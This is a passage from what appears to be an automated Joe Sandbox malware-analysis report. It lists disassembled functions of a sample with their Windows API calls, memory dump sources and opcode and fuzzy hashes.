                                                                                                                                                                            • Instruction Fuzzy Hash: 66C14B75A0021AEFDB14CF94C894AAABBB5FF48714F208599E505EB351D731ED81CF90
                                                                                                                                                                            Function 00884210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                            • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                                                                                            • Instruction ID: dad0a22d35b977cb68bf04ea3a89eca6051ae215b067a789fc7d3f73b302f58a
                                                                                                                                                                            • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA1457390538B9FEB21EF68C891BAEBBE4FF15310F284169E585DB282C2389D41C755
                                                                                                                                                                            Function 008B0CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008F0BD4,?), ref: 008B0E80
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008F0BD4,?), ref: 008B0E98
                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,008EDCE0,000000FF,?,00000000,00000800,00000000,?,008F0BD4,?), ref: 008B0EBD
                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 008B0EDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                            • Opcode ID: d8e4594594ef93ddf44167b2ef12898f504e31acc1c260d6a59ff89fa74aec7a
                                                                                                                                                                            • Instruction ID: 8406a73fd296202085b6ca51042f115c480dd82fc7d5182386e548928c91af77
                                                                                                                                                                            • Opcode Fuzzy Hash: d8e4594594ef93ddf44167b2ef12898f504e31acc1c260d6a59ff89fa74aec7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 67810771A00209AFCB14DF94C984EEEB7B9FF89315F204558E506EB250DB71AE4ACB61
                                                                                                                                                                            Function 008D2433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 008D245A
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D2468
                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008D24E7
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D24F1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                            • Opcode ID: cffe37bfab0bb4daec022d705b0b1136be6cea79307aae07f08f527e47fbd31e
                                                                                                                                                                            • Instruction ID: f59837b11f4d0de7cb555ba8019dfb2bd2b68781f94b64ca194292948d9dfffd
                                                                                                                                                                            • Opcode Fuzzy Hash: cffe37bfab0bb4daec022d705b0b1136be6cea79307aae07f08f527e47fbd31e
                                                                                                                                                                            • Instruction Fuzzy Hash: 1341CE34600200AFEB20AF28D89AF2A77E5FB14718F54C589F919DF3D2C672ED418B91
                                                                                                                                                                            Function 008E6BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008E6C41
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 008E6C74
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008E6CE1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                            • Opcode ID: 49e5a9eae07f629b924e7ef7d70beafa02307b61d32674ac7bf1844c18aa61e0
                                                                                                                                                                            • Instruction ID: c395629adc4021ca5231c15a98ba63cdfa953cfb87542a61237bc108016d7a99
                                                                                                                                                                            • Opcode Fuzzy Hash: 49e5a9eae07f629b924e7ef7d70beafa02307b61d32674ac7bf1844c18aa61e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 18514174A01249EFCF24CF55C9809AE7BB5FF563A0F208159F865DB2A0E731AD91CB90
                                                                                                                                                                            Function 008C6033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008C60DD
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 008C6103
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008C6128
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008C6154
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                            • Opcode ID: 6e0c035fe377c9e5c4909f763befecf98cc7f6ccff095c72c2dd77751c891603
                                                                                                                                                                            • Instruction ID: c23cbbfa76b7b3f0c32800580427046bdd7bd0b94769f9a02955cfb482eaab3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e0c035fe377c9e5c4909f763befecf98cc7f6ccff095c72c2dd77751c891603
                                                                                                                                                                            • Instruction Fuzzy Hash: 05411835600610DFCB11AF18C445A5EBBF2FF49311B198099EC4AAB362CB34FD49CB92
                                                                                                                                                                            Function 008E2039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 008E204A
                                                                                                                                                                              • Part of subcall function 008B42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B42E6
                                                                                                                                                                              • Part of subcall function 008B42CC: GetCurrentThreadId.KERNEL32 ref: 008B42ED
                                                                                                                                                                              • Part of subcall function 008B42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2E43), ref: 008B42F4
                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 008E205E
                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 008E20AB
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 008E20B1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                            • Opcode ID: 21feea8989fd801323003f9434f023e160c585b6e288ab223298c8d11f4acfbb
                                                                                                                                                                            • Instruction ID: a15c842382d7eca0f5f1fbfea3868f620fb3c9ba6f638e1bda08dba64fd28384
                                                                                                                                                                            • Opcode Fuzzy Hash: 21feea8989fd801323003f9434f023e160c585b6e288ab223298c8d11f4acfbb
                                                                                                                                                                            • Instruction Fuzzy Hash: 36311071D00249AFC704DFAAC881CAEB7FCFF58304B5084AAE415E7252D671DE45CB91
                                                                                                                                                                            Function 008BE7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00854154: _wcslen.LIBCMT ref: 00854159
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE7F7
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE80E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BE839
                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 008BE844
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                            • Opcode ID: 3cc82b71118a12d4a3427dc1a9356c5624fb9206014dc676bcd81034a2cc8f3c
                                                                                                                                                                            • Instruction ID: 818076ce809c1e2215e6654ed33c1720249924905e9961c7935d85c15c6b4d30
                                                                                                                                                                            • Opcode Fuzzy Hash: 3cc82b71118a12d4a3427dc1a9356c5624fb9206014dc676bcd81034a2cc8f3c
                                                                                                                                                                            • Instruction Fuzzy Hash: 04219171D00614AFCB119FA8C981BEEB7B8FF85350F148065E808EB385D670DE418BA2
                                                                                                                                                                            Function 008B8184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008B960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,008B8199,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?), ref: 008B961B
                                                                                                                                                                              • Part of subcall function 008B960C: lstrcpyW.KERNEL32(00000000,?,?,008B8199,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B9641
                                                                                                                                                                              • Part of subcall function 008B960C: lstrcmpiW.KERNEL32(00000000,?,008B8199,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?), ref: 008B9672
                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B81B2
                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B81D8
                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,008B8FE3,00000000,?,0000001C,?,?,00000000), ref: 008B8213
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                            • Opcode ID: 330381a97c8ad927c5d775358cd51374b6e37c518701f8f2ee641922a6c2a045
                                                                                                                                                                            • Instruction ID: 41cb9777ca813f33f4d1cfa519475632f1d679774e480cbd986b1b6c7e24a21a
                                                                                                                                                                            • Opcode Fuzzy Hash: 330381a97c8ad927c5d775358cd51374b6e37c518701f8f2ee641922a6c2a045
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11E63A200346EFCB145F78D885ABA77A9FF99350B50402AF946CB360EF71D801C7A1
                                                                                                                                                                            Function 008E8621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008E866A
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 008E8689
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008E86A1
                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008CC10A,00000000), ref: 008E86CA
                                                                                                                                                                              • Part of subcall function 00852441: GetWindowLongW.USER32(00000000,000000EB), ref: 00852452
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 847901565-0
                                                                                                                                                                            • Opcode ID: 4b5072b3cbaea5bdd0d562cf0d654660e7cfb08884cec68cebc5e9da13c831f9
                                                                                                                                                                            • Instruction ID: b271c56049fccf529b406a88088928fc4188703a1b4e63226ada7281eb456cfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b5072b3cbaea5bdd0d562cf0d654660e7cfb08884cec68cebc5e9da13c831f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 1111AC32504299EFCB109F6ADC48AAA3BA5FB56374F114724F939DB2F0DB308951DB90
                                                                                                                                                                            Function 00882099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 05d1e02fa0426bd3f7565bfcaa432eb3c7626cc8b16e36d5a3423a397db6a3fc
                                                                                                                                                                            • Instruction ID: 144796497cb39e9e8e4ca5894b6ffdb2eb018a54db0c09c46fc4bdefd6a2855e
                                                                                                                                                                            • Opcode Fuzzy Hash: 05d1e02fa0426bd3f7565bfcaa432eb3c7626cc8b16e36d5a3423a397db6a3fc
                                                                                                                                                                            • Instruction Fuzzy Hash: C801ADB620A61A7EF621367C6CC5F27774DFF523B8B310326F621E51D1EA609C418761
                                                                                                                                                                            Function 008B22B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 008B22D7
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B22E9
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B22FF
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008B231A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
                                                                                                                                                                            • Instruction ID: cbe40c3e9fa183117fe31d207e44be74a556cf357eb636d7aa540f9d9b4ca37d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c9a059abd5a0b78e5e78cc155750b823b84e4dd85b2410b8340ea640e6cb543
                                                                                                                                                                            • Instruction Fuzzy Hash: 6211093A900218FFEB119BA5CD85FDDFBB8FB08750F200091EA00B72A0D671AE10DB94
                                                                                                                                                                            Function 008EA852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00852441: GetWindowLongW.USER32(00000000,000000EB), ref: 00852452
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 008EA890
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 008EA89A
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 008EA8A5
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 008EA8D9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                            • Opcode ID: c05139ef1e1b8dc39cb63c5d7aa8b3a77491abd02a242ec00d81f78b128c2b71
                                                                                                                                                                            • Instruction ID: b34d0a521c37014a4a7feb568ddba78255a3d5b33188617eafa3e23116331df2
                                                                                                                                                                            • Opcode Fuzzy Hash: c05139ef1e1b8dc39cb63c5d7aa8b3a77491abd02a242ec00d81f78b128c2b71
                                                                                                                                                                            • Instruction Fuzzy Hash: 071125729001A9FBDF189F99D8859EE77B8FB06700F000466E911EA150D730BA86CBA2
                                                                                                                                                                            Function 008BEA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 008BEA29
                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 008BEA5C
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008BEA72
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008BEA79
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                            • Opcode ID: 2c2417ba50d00e10a639791f719d064c1ff383156e313c0dd95661d58c9ebcc1
                                                                                                                                                                            • Instruction ID: 693e53f38ee082b33f800734327505e27941097b2884552523db1db3cafa1413
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c2417ba50d00e10a639791f719d064c1ff383156e313c0dd95661d58c9ebcc1
                                                                                                                                                                            • Instruction Fuzzy Hash: B411E1769082A8BFC711EBA89C45ADA7FADFB45320F00821AF824E7391D274890487A1
                                                                                                                                                                            Function 008E8773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008E8792
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 008E87AA
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 008E87CE
